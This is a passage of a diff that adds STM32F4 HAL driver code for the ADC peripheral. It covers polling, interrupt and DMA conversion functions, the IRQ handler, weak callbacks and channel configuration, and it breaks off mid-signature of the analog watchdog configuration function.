HAL_ADC_STATE_ERROR_CONFIG); + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + return HAL_ERROR; + } + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check End of conversion flag */ + while(!(__HAL_ADC_GET_FLAG(hadc, ADC_FLAG_EOC))) + { + /* Check if timeout is disabled (set to infinite wait) */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U) || ((HAL_GetTick() - tickstart ) > Timeout)) + { + /* New check to avoid false timeout detection in case of preemption */ + if(!(__HAL_ADC_GET_FLAG(hadc, ADC_FLAG_EOC))) + { + /* Update ADC state machine to timeout */ + SET_BIT(hadc->State, HAL_ADC_STATE_TIMEOUT); + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + return HAL_TIMEOUT; + } + } + } + } + + /* Clear regular group conversion flag */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_STRT | ADC_FLAG_EOC); + + /* Update ADC state machine */ + SET_BIT(hadc->State, HAL_ADC_STATE_REG_EOC); + + /* Determine whether any further conversion upcoming on group regular */ + /* by external trigger, continuous mode or scan sequence on going. */ + /* Note: On STM32F4, there is no independent flag of end of sequence. */ + /* The test of scan sequence on going is done either with scan */ + /* sequence disabled or with end of conversion flag set to */ + /* of end of sequence. */ + if(ADC_IS_SOFTWARE_START_REGULAR(hadc) && + (hadc->Init.ContinuousConvMode == DISABLE) && + (HAL_IS_BIT_CLR(hadc->Instance->SQR1, ADC_SQR1_L) || + HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_EOCS) ) ) + { + /* Set ADC state */ + CLEAR_BIT(hadc->State, HAL_ADC_STATE_REG_BUSY); + + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_INJ_BUSY)) + { + SET_BIT(hadc->State, HAL_ADC_STATE_READY); + } + } + + /* Return ADC state */ + return HAL_OK; +} + +/** + * @brief Poll for conversion event + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param EventType the ADC event type. + * This parameter can be one of the following values: + * @arg ADC_AWD_EVENT: ADC Analog watch Dog event. + * @arg ADC_OVR_EVENT: ADC Overrun event. + * @param Timeout Timeout value in millisecond. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_PollForEvent(ADC_HandleTypeDef* hadc, uint32_t EventType, uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + assert_param(IS_ADC_EVENT_TYPE(EventType)); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check selected event flag */ + while(!(__HAL_ADC_GET_FLAG(hadc,EventType))) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U) || ((HAL_GetTick() - tickstart ) > Timeout)) + { + /* New check to avoid false timeout detection in case of preemption */ + if(!(__HAL_ADC_GET_FLAG(hadc,EventType))) + { + /* Update ADC state machine to timeout */ + SET_BIT(hadc->State, HAL_ADC_STATE_TIMEOUT); + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + return HAL_TIMEOUT; + } + } + } + } + + /* Analog watchdog (level out of window) event */ + if(EventType == ADC_AWD_EVENT) + { + /* Set ADC state */ + SET_BIT(hadc->State, HAL_ADC_STATE_AWD1); + + /* Clear ADC analog watchdog flag */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_AWD); + } + /* Overrun event */ + else + { + /* Set ADC state */ + SET_BIT(hadc->State, HAL_ADC_STATE_REG_OVR); + /* Set ADC error code to overrun */ + SET_BIT(hadc->ErrorCode, HAL_ADC_ERROR_OVR); + + /* Clear ADC overrun flag */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_OVR); + } + + /* Return ADC state */ + return HAL_OK; +} + + +/** + * @brief Enables the interrupt and starts ADC conversion of regular channels. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_ADC_Start_IT(ADC_HandleTypeDef* hadc) +{ + __IO uint32_t counter = 0U; + ADC_Common_TypeDef *tmpADC_Common; + + /* Check the parameters */ + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.ContinuousConvMode)); + assert_param(IS_ADC_EXT_TRIG_EDGE(hadc->Init.ExternalTrigConvEdge)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Enable the ADC peripheral */ + /* Check if ADC peripheral is disabled in order to enable it and wait during + Tstab time the ADC's stabilization */ + if((hadc->Instance->CR2 & ADC_CR2_ADON) != ADC_CR2_ADON) + { + /* Enable the Peripheral */ + __HAL_ADC_ENABLE(hadc); + + /* Delay for ADC stabilization time */ + /* Compute number of CPU cycles to wait for */ + counter = (ADC_STAB_DELAY_US * (SystemCoreClock / 1000000U)); + while(counter != 0U) + { + counter--; + } + } + + /* Start conversion if ADC is effectively enabled */ + if(HAL_IS_BIT_SET(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Set ADC state */ + /* - Clear state bitfield related to regular group conversion results */ + /* - Set state bitfield related to regular group operation */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_READY | HAL_ADC_STATE_REG_EOC | HAL_ADC_STATE_REG_OVR, + HAL_ADC_STATE_REG_BUSY); + + /* If conversions on group regular are also triggering group injected, */ + /* update ADC state. */ + if (READ_BIT(hadc->Instance->CR1, ADC_CR1_JAUTO) != RESET) + { + ADC_STATE_CLR_SET(hadc->State, HAL_ADC_STATE_INJ_EOC, HAL_ADC_STATE_INJ_BUSY); + } + + /* State machine update: Check if an injected conversion is ongoing */ + if (HAL_IS_BIT_SET(hadc->State, HAL_ADC_STATE_INJ_BUSY)) + { + /* Reset ADC error code fields related to conversions on group regular */ + CLEAR_BIT(hadc->ErrorCode, (HAL_ADC_ERROR_OVR | HAL_ADC_ERROR_DMA)); + } + else + { + /* Reset ADC all error code fields */ + ADC_CLEAR_ERRORCODE(hadc); + } + + /* Process unlocked */ + /* Unlock before starting ADC conversions: in case of potential */ + /* interruption, to let the process to ADC IRQ Handler. */ + __HAL_UNLOCK(hadc); + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADCs and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Clear regular group conversion flag and overrun flag */ + /* (To ensure of no unknown state from potential previous ADC operations) */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_EOC | ADC_FLAG_OVR); + + /* Enable end of conversion interrupt for regular group */ + __HAL_ADC_ENABLE_IT(hadc, (ADC_IT_EOC | ADC_IT_OVR)); + + /* Check if Multimode enabled */ + if(HAL_IS_BIT_CLR(tmpADC_Common->CCR, ADC_CCR_MULTI)) + { +#if defined(ADC2) && defined(ADC3) + if((hadc->Instance == ADC1) || ((hadc->Instance == ADC2) && ((ADC->CCR & ADC_CCR_MULTI_Msk) < ADC_CCR_MULTI_0)) \ + || ((hadc->Instance == ADC3) && ((ADC->CCR & ADC_CCR_MULTI_Msk) < ADC_CCR_MULTI_4))) + { +#endif /* ADC2 || ADC3 */ + /* if no external trigger present enable software conversion of regular channels */ + if((hadc->Instance->CR2 & ADC_CR2_EXTEN) == RESET) + { + /* Enable the selected ADC software conversion for regular group */ + hadc->Instance->CR2 |= (uint32_t)ADC_CR2_SWSTART; + } +#if defined(ADC2) && defined(ADC3) + } +#endif /* ADC2 || ADC3 */ + } + else + { + /* if instance of handle correspond to ADC1 and no external trigger present enable software conversion of regular channels */ + if((hadc->Instance == ADC1) && ((hadc->Instance->CR2 & ADC_CR2_EXTEN) == RESET)) + { + /* Enable the selected ADC software conversion for regular group */ + hadc->Instance->CR2 |= (uint32_t)ADC_CR2_SWSTART; + } + } + } + else + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL); + + /* Set ADC error code to ADC IP internal error */ + SET_BIT(hadc->ErrorCode, HAL_ADC_ERROR_INTERNAL); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Disables the interrupt and stop ADC conversion of regular channels. + * + * @note Caution: This function will stop also injected channels. + * + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_ADC_Stop_IT(ADC_HandleTypeDef* hadc) +{ + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Stop potential conversion on going, on regular and injected groups */ + /* Disable ADC peripheral */ + __HAL_ADC_DISABLE(hadc); + + /* Check if ADC is effectively disabled */ + if(HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Disable ADC end of conversion interrupt for regular group */ + __HAL_ADC_DISABLE_IT(hadc, (ADC_IT_EOC | ADC_IT_OVR)); + + /* Set ADC state */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_REG_BUSY | HAL_ADC_STATE_INJ_BUSY, + HAL_ADC_STATE_READY); + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Handles ADC interrupt request + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +void HAL_ADC_IRQHandler(ADC_HandleTypeDef* hadc) +{ + uint32_t tmp1 = 0U, tmp2 = 0U; + + /* Check the parameters */ + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.ContinuousConvMode)); + assert_param(IS_ADC_REGULAR_LENGTH(hadc->Init.NbrOfConversion)); + assert_param(IS_ADC_EOCSelection(hadc->Init.EOCSelection)); + + tmp1 = __HAL_ADC_GET_FLAG(hadc, ADC_FLAG_EOC); + tmp2 = __HAL_ADC_GET_IT_SOURCE(hadc, ADC_IT_EOC); + /* Check End of conversion flag for regular channels */ + if(tmp1 && tmp2) + { + /* Update state machine on conversion status if not in error state */ + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL)) + { + /* Set ADC state */ + SET_BIT(hadc->State, HAL_ADC_STATE_REG_EOC); + } + + /* Determine whether any further conversion upcoming on group regular */ + /* by external trigger, continuous mode or scan sequence on going. */ + /* Note: On STM32F4, there is no independent flag of end of sequence. */ + /* The test of scan sequence on going is done either with scan */ + /* sequence disabled or with end of conversion flag set to */ + /* of end of sequence. */ + if(ADC_IS_SOFTWARE_START_REGULAR(hadc) && + (hadc->Init.ContinuousConvMode == DISABLE) && + (HAL_IS_BIT_CLR(hadc->Instance->SQR1, ADC_SQR1_L) || + HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_EOCS) ) ) + { + /* Disable ADC end of single conversion interrupt on group regular */ + /* Note: Overrun interrupt was enabled with EOC interrupt in */ + /* HAL_ADC_Start_IT(), but is not disabled here because can be used */ + /* by overrun IRQ process below. */ + __HAL_ADC_DISABLE_IT(hadc, ADC_IT_EOC); + + /* Set ADC state */ + CLEAR_BIT(hadc->State, HAL_ADC_STATE_REG_BUSY); + + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_INJ_BUSY)) + { + SET_BIT(hadc->State, HAL_ADC_STATE_READY); + } + } + + /* Conversion complete callback */ +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + hadc->ConvCpltCallback(hadc); +#else + HAL_ADC_ConvCpltCallback(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + + /* Clear regular group conversion flag */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_STRT | ADC_FLAG_EOC); + } + + tmp1 = __HAL_ADC_GET_FLAG(hadc, ADC_FLAG_JEOC); + tmp2 = __HAL_ADC_GET_IT_SOURCE(hadc, ADC_IT_JEOC); + /* Check End of conversion flag for injected channels */ + if(tmp1 && tmp2) + { + /* Update state machine on conversion status if not in error state */ + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL)) + { + /* Set ADC state */ + SET_BIT(hadc->State, HAL_ADC_STATE_INJ_EOC); + } + + /* Determine whether any further conversion upcoming on group injected */ + /* by external trigger, scan sequence on going or by automatic injected */ + /* conversion from group regular (same conditions as group regular */ + /* interruption disabling above). */ + if(ADC_IS_SOFTWARE_START_INJECTED(hadc) && + (HAL_IS_BIT_CLR(hadc->Instance->JSQR, ADC_JSQR_JL) || + HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_EOCS) ) && + (HAL_IS_BIT_CLR(hadc->Instance->CR1, ADC_CR1_JAUTO) && + (ADC_IS_SOFTWARE_START_REGULAR(hadc) && + (hadc->Init.ContinuousConvMode == DISABLE) ) ) ) + { + /* Disable ADC end of single conversion interrupt on group injected */ + __HAL_ADC_DISABLE_IT(hadc, ADC_IT_JEOC); + + /* Set ADC state */ + CLEAR_BIT(hadc->State, HAL_ADC_STATE_INJ_BUSY); + + if (HAL_IS_BIT_CLR(hadc->State, HAL_ADC_STATE_REG_BUSY)) + { + SET_BIT(hadc->State, HAL_ADC_STATE_READY); + } + } + + /* Conversion complete callback */ + /* Conversion complete callback */ +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + hadc->InjectedConvCpltCallback(hadc); +#else + HAL_ADCEx_InjectedConvCpltCallback(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + + /* Clear injected group conversion flag */ + __HAL_ADC_CLEAR_FLAG(hadc, (ADC_FLAG_JSTRT | ADC_FLAG_JEOC)); + } + + tmp1 = __HAL_ADC_GET_FLAG(hadc, ADC_FLAG_AWD); + tmp2 = __HAL_ADC_GET_IT_SOURCE(hadc, ADC_IT_AWD); + /* Check Analog watchdog flag */ + if(tmp1 && tmp2) + { + if(__HAL_ADC_GET_FLAG(hadc, ADC_FLAG_AWD)) + { + /* Set ADC state */ + SET_BIT(hadc->State, HAL_ADC_STATE_AWD1); + + /* Level out of window callback */ +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + hadc->LevelOutOfWindowCallback(hadc); +#else + HAL_ADC_LevelOutOfWindowCallback(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + + /* Clear the ADC analog watchdog flag */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_AWD); + } + } + + tmp1 = __HAL_ADC_GET_FLAG(hadc, ADC_FLAG_OVR); + tmp2 = __HAL_ADC_GET_IT_SOURCE(hadc, ADC_IT_OVR); + /* Check Overrun flag */ + if(tmp1 && tmp2) + { + /* Note: On STM32F4, ADC overrun can be set through other parameters */ + /* refer to description of parameter "EOCSelection" for more */ + /* details. */ + + /* Set ADC error code to overrun */ + SET_BIT(hadc->ErrorCode, HAL_ADC_ERROR_OVR); + + /* Clear ADC overrun flag */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_OVR); + + /* Error callback */ +#if (USE_HAL_ADC_REGISTER_CALLBACKS == 1) + hadc->ErrorCallback(hadc); +#else + HAL_ADC_ErrorCallback(hadc); +#endif /* USE_HAL_ADC_REGISTER_CALLBACKS */ + + /* Clear the Overrun flag */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_OVR); + } +} + +/** + * @brief Enables ADC DMA request after last transfer (Single-ADC mode) and enables ADC peripheral + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param pData The destination Buffer address. + * @param Length The length of data to be transferred from ADC peripheral to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_Start_DMA(ADC_HandleTypeDef* hadc, uint32_t* pData, uint32_t Length) +{ + __IO uint32_t counter = 0U; + ADC_Common_TypeDef *tmpADC_Common; + + /* Check the parameters */ + assert_param(IS_FUNCTIONAL_STATE(hadc->Init.ContinuousConvMode)); + assert_param(IS_ADC_EXT_TRIG_EDGE(hadc->Init.ExternalTrigConvEdge)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Enable the ADC peripheral */ + /* Check if ADC peripheral is disabled in order to enable it and wait during + Tstab time the ADC's stabilization */ + if((hadc->Instance->CR2 & ADC_CR2_ADON) != ADC_CR2_ADON) + { + /* Enable the Peripheral */ + __HAL_ADC_ENABLE(hadc); + + /* Delay for ADC stabilization time */ + /* Compute number of CPU cycles to wait for */ + counter = (ADC_STAB_DELAY_US * (SystemCoreClock / 1000000U)); + while(counter != 0U) + { + counter--; + } + } + + /* Check ADC DMA Mode */ + /* - disable the DMA Mode if it is already enabled */ + if((hadc->Instance->CR2 & ADC_CR2_DMA) == ADC_CR2_DMA) + { + CLEAR_BIT(hadc->Instance->CR2, ADC_CR2_DMA); + } + + /* Start conversion if ADC is effectively enabled */ + if(HAL_IS_BIT_SET(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Set ADC state */ + /* - Clear state bitfield related to regular group conversion results */ + /* - Set state bitfield related to regular group operation */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_READY | HAL_ADC_STATE_REG_EOC | HAL_ADC_STATE_REG_OVR, + HAL_ADC_STATE_REG_BUSY); + + /* If conversions on group regular are also triggering group injected, */ + /* update ADC state. */ + if (READ_BIT(hadc->Instance->CR1, ADC_CR1_JAUTO) != RESET) + { + ADC_STATE_CLR_SET(hadc->State, HAL_ADC_STATE_INJ_EOC, HAL_ADC_STATE_INJ_BUSY); + } + + /* State machine update: Check if an injected conversion is ongoing */ + if (HAL_IS_BIT_SET(hadc->State, HAL_ADC_STATE_INJ_BUSY)) + { + /* Reset ADC error code fields related to conversions on group regular */ + CLEAR_BIT(hadc->ErrorCode, (HAL_ADC_ERROR_OVR | HAL_ADC_ERROR_DMA)); + } + else + { + /* Reset ADC all error code fields */ + ADC_CLEAR_ERRORCODE(hadc); + } + + /* Process unlocked */ + /* Unlock before starting ADC conversions: in case of potential */ + /* interruption, to let the process to ADC IRQ Handler. */ + __HAL_UNLOCK(hadc); + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADCs and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* Set the DMA transfer complete callback */ + hadc->DMA_Handle->XferCpltCallback = ADC_DMAConvCplt; + + /* Set the DMA half transfer complete callback */ + hadc->DMA_Handle->XferHalfCpltCallback = ADC_DMAHalfConvCplt; + + /* Set the DMA error callback */ + hadc->DMA_Handle->XferErrorCallback = ADC_DMAError; + + + /* Manage ADC and DMA start: ADC overrun interruption, DMA start, ADC */ + /* start (in case of SW start): */ + + /* Clear regular group conversion flag and overrun flag */ + /* (To ensure of no unknown state from potential previous ADC operations) */ + __HAL_ADC_CLEAR_FLAG(hadc, ADC_FLAG_EOC | ADC_FLAG_OVR); + + /* Enable ADC overrun interrupt */ + __HAL_ADC_ENABLE_IT(hadc, ADC_IT_OVR); + + /* Enable ADC DMA mode */ + hadc->Instance->CR2 |= ADC_CR2_DMA; + + /* Start the DMA channel */ + HAL_DMA_Start_IT(hadc->DMA_Handle, (uint32_t)&hadc->Instance->DR, (uint32_t)pData, Length); + + /* Check if Multimode enabled */ + if(HAL_IS_BIT_CLR(tmpADC_Common->CCR, ADC_CCR_MULTI)) + { +#if defined(ADC2) && defined(ADC3) + if((hadc->Instance == ADC1) || ((hadc->Instance == ADC2) && ((ADC->CCR & ADC_CCR_MULTI_Msk) < ADC_CCR_MULTI_0)) \ + || ((hadc->Instance == ADC3) && ((ADC->CCR & ADC_CCR_MULTI_Msk) < ADC_CCR_MULTI_4))) + { +#endif /* ADC2 || ADC3 */ + /* if no external trigger present enable software conversion of regular channels */ + if((hadc->Instance->CR2 & ADC_CR2_EXTEN) == RESET) + { + /* Enable the selected ADC software conversion for regular group */ + hadc->Instance->CR2 |= (uint32_t)ADC_CR2_SWSTART; + } +#if defined(ADC2) && defined(ADC3) + } +#endif /* ADC2 || ADC3 */ + } + else + { + /* if instance of handle correspond to ADC1 and no external trigger present enable software conversion of regular channels */ + if((hadc->Instance == ADC1) && ((hadc->Instance->CR2 & ADC_CR2_EXTEN) == RESET)) + { + /* Enable the selected ADC software conversion for regular group */ + hadc->Instance->CR2 |= (uint32_t)ADC_CR2_SWSTART; + } + } + } + else + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_INTERNAL); + + /* Set ADC error code to ADC IP internal error */ + SET_BIT(hadc->ErrorCode, HAL_ADC_ERROR_INTERNAL); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Disables ADC DMA (Single-ADC mode) and disables ADC peripheral + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_Stop_DMA(ADC_HandleTypeDef* hadc) +{ + HAL_StatusTypeDef tmp_hal_status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(hadc->Instance)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* Stop potential conversion on going, on regular and injected groups */ + /* Disable ADC peripheral */ + __HAL_ADC_DISABLE(hadc); + + /* Check if ADC is effectively disabled */ + if(HAL_IS_BIT_CLR(hadc->Instance->CR2, ADC_CR2_ADON)) + { + /* Disable the selected ADC DMA mode */ + hadc->Instance->CR2 &= ~ADC_CR2_DMA; + + /* Disable the DMA channel (in case of DMA in circular mode or stop while */ + /* DMA transfer is on going) */ + if (hadc->DMA_Handle->State == HAL_DMA_STATE_BUSY) + { + tmp_hal_status = HAL_DMA_Abort(hadc->DMA_Handle); + + /* Check if DMA channel effectively disabled */ + if (tmp_hal_status != HAL_OK) + { + /* Update ADC state machine to error */ + SET_BIT(hadc->State, HAL_ADC_STATE_ERROR_DMA); + } + } + + /* Disable ADC overrun interrupt */ + __HAL_ADC_DISABLE_IT(hadc, ADC_IT_OVR); + + /* Set ADC state */ + ADC_STATE_CLR_SET(hadc->State, + HAL_ADC_STATE_REG_BUSY | HAL_ADC_STATE_INJ_BUSY, + HAL_ADC_STATE_READY); + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return tmp_hal_status; +} + +/** + * @brief Gets the converted value from data register of regular channel. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval Converted value + */ +uint32_t HAL_ADC_GetValue(ADC_HandleTypeDef* hadc) +{ + /* Return the selected ADC converted value */ + return hadc->Instance->DR; +} + +/** + * @brief Regular conversion complete callback in non blocking mode + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +__weak void HAL_ADC_ConvCpltCallback(ADC_HandleTypeDef* hadc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hadc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ADC_ConvCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Regular conversion half DMA transfer callback in non blocking mode + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +__weak void HAL_ADC_ConvHalfCpltCallback(ADC_HandleTypeDef* hadc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hadc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ADC_ConvHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Analog watchdog callback in non blocking mode + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +__weak void HAL_ADC_LevelOutOfWindowCallback(ADC_HandleTypeDef* hadc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hadc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ADC_LevelOoutOfWindowCallback could be implemented in the user file + */ +} + +/** + * @brief Error ADC callback. + * @note In case of error due to overrun when using ADC with DMA transfer + * (HAL ADC handle paramater "ErrorCode" to state "HAL_ADC_ERROR_OVR"): + * - Reinitialize the DMA using function "HAL_ADC_Stop_DMA()". + * - If needed, restart a new ADC conversion using function + * "HAL_ADC_Start_DMA()" + * (this function is also clearing overrun flag) + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @retval None + */ +__weak void HAL_ADC_ErrorCallback(ADC_HandleTypeDef *hadc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hadc); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_ADC_ErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup ADC_Exported_Functions_Group3 Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure regular channels. + (+) Configure injected channels. + (+) Configure multimode. + (+) Configure the analog watch dog. + +@endverbatim + * @{ + */ + + /** + * @brief Configures for the selected ADC regular channel its corresponding + * rank in the sequencer and its sample time. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param sConfig ADC configuration structure. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_ConfigChannel(ADC_HandleTypeDef* hadc, ADC_ChannelConfTypeDef* sConfig) +{ + __IO uint32_t counter = 0U; + ADC_Common_TypeDef *tmpADC_Common; + + /* Check the parameters */ + assert_param(IS_ADC_CHANNEL(sConfig->Channel)); + assert_param(IS_ADC_REGULAR_RANK(sConfig->Rank)); + assert_param(IS_ADC_SAMPLE_TIME(sConfig->SamplingTime)); + + /* Process locked */ + __HAL_LOCK(hadc); + + /* if ADC_Channel_10 ... ADC_Channel_18 is selected */ + if (sConfig->Channel > ADC_CHANNEL_9) + { + /* Clear the old sample time */ + hadc->Instance->SMPR1 &= ~ADC_SMPR1(ADC_SMPR1_SMP10, sConfig->Channel); + + /* Set the new sample time */ + hadc->Instance->SMPR1 |= ADC_SMPR1(sConfig->SamplingTime, sConfig->Channel); + } + else /* ADC_Channel include in ADC_Channel_[0..9] */ + { + /* Clear the old sample time */ + hadc->Instance->SMPR2 &= ~ADC_SMPR2(ADC_SMPR2_SMP0, sConfig->Channel); + + /* Set the new sample time */ + hadc->Instance->SMPR2 |= ADC_SMPR2(sConfig->SamplingTime, sConfig->Channel); + } + + /* For Rank 1 to 6 */ + if (sConfig->Rank < 7U) + { + /* Clear the old SQx bits for the selected rank */ + hadc->Instance->SQR3 &= ~ADC_SQR3_RK(ADC_SQR3_SQ1, sConfig->Rank); + + /* Set the SQx bits for the selected rank */ + hadc->Instance->SQR3 |= ADC_SQR3_RK(sConfig->Channel, sConfig->Rank); + } + /* For Rank 7 to 12 */ + else if (sConfig->Rank < 13U) + { + /* Clear the old SQx bits for the selected rank */ + hadc->Instance->SQR2 &= ~ADC_SQR2_RK(ADC_SQR2_SQ7, sConfig->Rank); + + /* Set the SQx bits for the selected rank */ + hadc->Instance->SQR2 |= ADC_SQR2_RK(sConfig->Channel, sConfig->Rank); + } + /* For Rank 13 to 16 */ + else + { + /* Clear the old SQx bits for the selected rank */ + hadc->Instance->SQR1 &= ~ADC_SQR1_RK(ADC_SQR1_SQ13, sConfig->Rank); + + /* Set the SQx bits for the selected rank */ + hadc->Instance->SQR1 |= ADC_SQR1_RK(sConfig->Channel, sConfig->Rank); + } + + /* Pointer to the common control register to which is belonging hadc */ + /* (Depending on STM32F4 product, there may be up to 3 ADCs and 1 common */ + /* control register) */ + tmpADC_Common = ADC_COMMON_REGISTER(hadc); + + /* if ADC1 Channel_18 is selected for VBAT Channel ennable VBATE */ + if ((hadc->Instance == ADC1) && (sConfig->Channel == ADC_CHANNEL_VBAT)) + { + /* Disable the TEMPSENSOR channel in case of using board with multiplixed ADC_CHANNEL_VBAT & ADC_CHANNEL_TEMPSENSOR*/ + if ((uint16_t)ADC_CHANNEL_TEMPSENSOR == (uint16_t)ADC_CHANNEL_VBAT) + { + tmpADC_Common->CCR &= ~ADC_CCR_TSVREFE; + } + /* Enable the VBAT channel*/ + tmpADC_Common->CCR |= ADC_CCR_VBATE; + } + + /* if ADC1 Channel_16 or Channel_18 is selected for Temperature sensor or + Channel_17 is selected for VREFINT enable TSVREFE */ + if ((hadc->Instance == ADC1) && ((sConfig->Channel == ADC_CHANNEL_TEMPSENSOR) || (sConfig->Channel == ADC_CHANNEL_VREFINT))) + { + /* Disable the VBAT channel in case of using board with multiplixed ADC_CHANNEL_VBAT & ADC_CHANNEL_TEMPSENSOR*/ + if ((uint16_t)ADC_CHANNEL_TEMPSENSOR == (uint16_t)ADC_CHANNEL_VBAT) + { + tmpADC_Common->CCR &= ~ADC_CCR_VBATE; + } + /* Enable the Temperature sensor and VREFINT channel*/ + tmpADC_Common->CCR |= ADC_CCR_TSVREFE; + + if(sConfig->Channel == ADC_CHANNEL_TEMPSENSOR) + { + /* Delay for temperature sensor stabilization time */ + /* Compute number of CPU cycles to wait for */ + counter = (ADC_TEMPSENSOR_DELAY_US * (SystemCoreClock / 1000000U)); + while(counter != 0U) + { + counter--; + } + } + } + + /* Process unlocked */ + __HAL_UNLOCK(hadc); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Configures the analog watchdog. + * @note Analog watchdog thresholds can be modified while ADC conversion + * is on going. + * In this case, some constraints must be taken into account: + * The programmed threshold values are effective from the next + * ADC EOC (end of unitary conversion). + * Considering that registers write delay may happen due to + * bus activity, this might cause an uncertainty on the + * effective timing of the new programmed threshold values. + * @param hadc pointer to a ADC_HandleTypeDef structure that contains + * the configuration information for the specified ADC. + * @param AnalogWDGConfig pointer to an ADC_AnalogWDGConfTypeDef structure + * that contains the configuration information of ADC analog watchdog. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ADC_AnalogWDGConfig(ADC_HandleTypeDef* hadc, ADC_AnalogWDGConfTypeDef* 